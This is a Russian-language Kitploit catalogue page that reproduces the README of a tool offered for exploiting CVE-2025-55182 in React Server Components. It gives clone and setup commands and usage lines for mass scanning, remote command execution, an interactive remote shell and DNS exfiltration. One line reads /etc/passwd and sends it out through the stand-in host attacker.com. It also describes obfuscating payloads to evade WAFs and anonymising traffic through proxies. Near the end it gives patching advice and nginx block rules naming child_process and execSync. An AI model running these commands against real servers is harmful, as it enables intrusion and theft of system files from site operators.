Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Продвинутый сканер RCE для React Server Components, предназначенный для CVE-2025-55182. Возможности: многоэтапное фингерпринтинг, проверка уязвимости, DNS-эксфильтрация, интерактивная оболочка, обфускация полезной нагрузки и профессиональная отчётность (JSON/HTML/PDF). Только авторизованное тестирование. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхОбход WAFТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHubcerberusmrxi/cve-2025-55182-advanced-react-server-components-rce-exploit

CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

Репозиторий
191 месяц назадЕщё не проверено

Описание

Продвинутый сканер RCE для React Server Components, предназначенный для CVE-2025-55182. Возможности: многоэтапное фингерпринтинг, проверка уязвимости, DNS-эксфильтрация, интерактивная оболочка, обфускация полезной нагрузки и профессиональная отчётность (JSON/HTML/PDF). Только авторизованное тестирование.

Поделиться

🔐 ReactRCE-Scanner

CVE-2025-55182 — Продвинутый фреймворк для эксплуатации и оценки RCE в React Server Components

Version CVE CVSS Python License

Author PRs Welcome Downloads


📑 Содержание

  • Правовая оговорка и этическое уведомление

  • Обзор

  • Ключевые возможности

  • Краткое руководство по началу работы

  • Архитектура и подробный обзор возможностей

  • Справочник по конфигурации

  • Автоматизированный набор тестов

  • Устранение и смягчение последствий

  • Участие и сообщество

  • Ссылки

  • Лицензия и автор


⚠️ Правовая оговорка и этическое уведомление

Этот инструмент разработан исключительно в ОБРАЗОВАТЕЛЬНЫХ целях и для АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ. Неавторизованное использование данного программного обеспечения против целей без предварительного письменного согласия является нарушением международных законов о компьютерных преступлениях, включая Computer Fraud and Abuse Act (CFAA), требования GDPR и стандартные условия соглашений об оказании услуг. Автор и участники проекта снимают с себя всякую ответственность за любое неправомерное использование, незаконные операции или косвенный ущерб, возникший в результате работы этой программы. Действуйте строго на свой страх и риск.


📋 Обзор

ReactRCE-Scanner — это фреймворк корпоративного уровня для оценки и проверки безопасности, разработанный специально для CVE-2025-55182 [1] — критической уязвимости удалённого выполнения кода (RCE), затрагивающей React Server Components в версиях от 19.0.0 до 19.2.0.

Фреймворк устраняет разрыв между теоретическими исследованиями уязвимостей и практической проверкой безопасности. Благодаря многоэтапному фингерпринтингу, строгому снижению числа ложных срабатываний, продвинутой обфускации полезной нагрузки и автоматизированной отчётности в нескольких форматах, он предоставляет инженерам по безопасности точные диагностические возможности.

ИспользованиеРезультаты сканирования

🎯 Ключевые возможности


🚀 Краткое руководство по началу работы

Установка

Клонируйте репозиторий и инициализируйте окружение с помощью автоматизированного скрипта установки или ручной установки зависимостей:

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit

# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh

# Alternatively, install core Python dependencies manually
pip install -r requirements.txt

Справочник основных команд

Фреймворк работает через модульную CLI-архитектуру, поддерживающую проверку одной цели, массовое сканирование из списков файлов, запуск интерактивной оболочки и формирование отчётов о соответствии.

root@kitploit:~
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan

# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json

# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"

# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell

# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com

# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf

🔬 Архитектура и подробный обзор возможностей

1. Движок умного фингерпринтинга

Фреймворк выполняет глубокую разведку перед доставкой полезной нагрузки. Он анализирует множество полей HTTP-заголовков (X-Powered-By, Next-Action, RSC), структурные мета-теги HTML (data-reactroot, __NEXT_DATA__), статические ресурсы сборки и исходные JavaScript-бандлы [2] [3].

Оценки достоверности разделены на четыре уровня:

  • CRITICAL (95%+): Несколько независимых индикаторов подтверждают уязвимые версии среды выполнения React Server Component.

  • HIGH (75–95%): Обнаружены сильные структурные индикаторы с точным совпадением версии.

  • MEDIUM (50–75%): Присутствуют частичные маркеры фреймворка; требуется ручная проверка.

  • LOW (<50%): Обнаружены слабые эвристики; высокая вероятность ложного срабатывания.

2. Рабочий процесс многоэтапной проверки

Для поддержания целостности операций и предотвращения непреднамеренных нарушений работы сервисов полезные нагрузки проходят строгий конвейер валидации, прежде чем разблокируется какая-либо фаза эксплуатации.

root@kitploit:~
Target URL / Endpoint
       │
       ▼
[Stage 1] Framework & Header Detection
       │
       ▼
[Stage 2] Component Version Analysis
       │
       ▼
[Stage 3] Protocol Compatibility Check
       │
       ▼
[Stage 4] Non-Destructive Safe Validation Request
       │
       ▼
[Stage 5] Statistical Confidence Scoring
       │
       ▼
Vulnerability Assessment Decision

3. Обфускация полезной нагрузки и уклонение

Для тестирования защитных механизмов и Web Application Firewall (WAF) фреймворк включает продвинутый генератор полезных нагрузок с поддержкой:

  • Схемы кодирования: Преобразования Base64, шестнадцатеричные и восьмеричные.

  • Структурная обфускация: Динамическое разбиение строк, внедрение мусорного кода и альтернативное сопоставление метода require.

  • Внеполосная (OOB) эксфильтрация: Безопасное туннелирование данных через DNS-запросы, когда прямые каналы ответа ограничены.

4. Интерактивная командная оболочка

После успешного установления сессии операторы могут вызвать интерактивную оболочку для перечисления после проверки.

root@kitploit:~
$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.

shell> whoami
www-data

shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux

shell> exit
[*] Terminating session and cleaning up temporary artifacts...

5. Профессиональный набор отчётности

Отчёты могут генерироваться в нескольких стандартизированных форматах (JSON, HTML, PDF, Markdown), содержащих резюме для руководства, метрики риска, подробные технические выводы, хронологию доказательств и разбивку оценок по CVSS v3.1 [4].


⚙️ Справочник по конфигурации

Расширенные параметры управляются через файл конфигурации config.yaml. Ниже приведён шаблон производственной конфигурации:

root@kitploit:~
# ReactRCE-Scanner Production Configuration

timeout: 30
threads: 20
max_retries: 3
proxy: null

user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"

headers:
  Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
  Accept-Language: "en-US,en;q=0.5"
  Accept-Encoding: "gzip, deflate, br"

output:
  format: "json"
  directory: "./reports"

logging:
  level: "INFO"
  file: "exploit.log"

exploit:
  obfuscate: true
  encoding: "base64"
  timeout: 60

scanning:
  concurrent_scans: 20
  rate_limit: 0.5
  timeout: 30

fingerprint:
  enable_deep_analysis: true
  follow_redirects: true
  analyze_assets: true

Запускайте сканирование с использованием пользовательского файла конфигурации следующим образом:

root@kitploit:~
python exploit.py -f targets.txt -C config.yaml -o report.json

🧪 Автоматизированный набор тестов

Репозиторий включает комплексный набор модульных и интеграционных тестов для обеспечения стабильности модулей между релизами.

root@kitploit:~
# Execute the complete automated test suite
python exploit.py --test

# Expected Output:
Running test suite...
✓ test_fingerprinting passed
✓ test_payload_generation passed
✓ test_config_loading passed
✓ test_verification passed
✓ test_report_generation passed

Tests passed: 5/5

Для участников, настраивающих локальную среду разработки:

root@kitploit:~
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
pip install -r requirements-dev.txt

# Run pytest unit tests
pytest tests/

# Format and lint codebase
black exploit.py
flake8 exploit.py

🛡️ Устранение и смягчение последствий

Немедленные административные действия

  1. Патчинг: Немедленно обновите пакеты React до версии 19.2.1 или выше. Обновите экземпляры Next.js до версии 15.0.4+ [5].

  2. Мониторинг: Проверьте журналы доступа HTTP на подозрительные значения заголовка Next-Action и невалидированные ссылки на прототипы (__proto__, constructor) [6].

  3. Усиление сетевой защиты: Ограничьте исходящие рекурсивные DNS-запросы с серверов приложений для предотвращения эксфильтрации данных.

Примеры правил WAF (Nginx / OpenResty)

root@kitploit:~
# Block prototype pollution and remote execution attempts in request bodies
if ($request_body ~* "__proto__") {
    return 403;
}
if ($request_body ~* "constructor") {
    return 403;
}
if ($request_body ~* "child_process") {
    return 403;
}
if ($request_body ~* "execSync") {
    return 403;
}

📚 Ссылки

  1. National Vulnerability Database — CVE-2025-55182 Advisory

  2. React Security Documentation & Advisories

  3. Next.js Security Bulletins

  4. FIRST CVSS v3.1 Specification & Calculator

  5. OWASP Guide to Prototype Pollution Vulnerabilities

  6. Node.js Child Process Security Best Practices


🤝 Участие и сообщество

Мы приветствуем вклад, запросы на новые функции и сообщения об ошибках. Пожалуйста, следуйте стандартному рабочему процессу fork-and-pull request:

  1. Форкните репозиторий (https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit/fork)

  2. Создайте ветку для своей функции (git checkout -b feature/AdvancedScannerModule)

  3. Зафиксируйте изменения (git commit -m 'Add advanced scanning heuristic')

  4. Отправьте изменения в ветку (git origin push feature/AdvancedScannerModule)

  5. Откройте Pull Request


📜 Лицензия и автор

Распространяется под лицензией MIT. Подробнее см. LICENSE.

Создано с точностью CerberusMrXi Последнее обновление: август 2026

Скачать инструмент
Категория возможностиКлючевая реализацияСтатус
Умный фингерпринтингМногоисточниковое определение фреймворка и версии с алгоритмами оценки достоверности.✅
Многоэтапная проверка5-этапный конвейер валидации, предназначенный для систематического исключения ложных срабатываний.✅
Генерация полезной нагрузкиКонструктор обфусцированных полезных нагрузок с поддержкой DNS-эксфильтрации и множественных кодировок.✅
Интерактивная оболочкаПсевдоинтерактивное выполнение команд в реальном времени и доступ к оболочке на подтверждённых целях.✅
Комплексная отчётностьАвтоматическая генерация отчётов в форматах JSON, HTML, PDF и Markdown.✅
DNS-эксфильтрацияВнеполосная эксфильтрация вывода команд через безопасную обработку DNS-запросов.✅
Движок параллелизмаВысокопроизводительная многопоточная архитектура сканирования для больших поверхностей атаки.✅
Интеграция с проксиПоддержка HTTP/HTTPS и SOCKS прокси для анонимизации трафика оценки.✅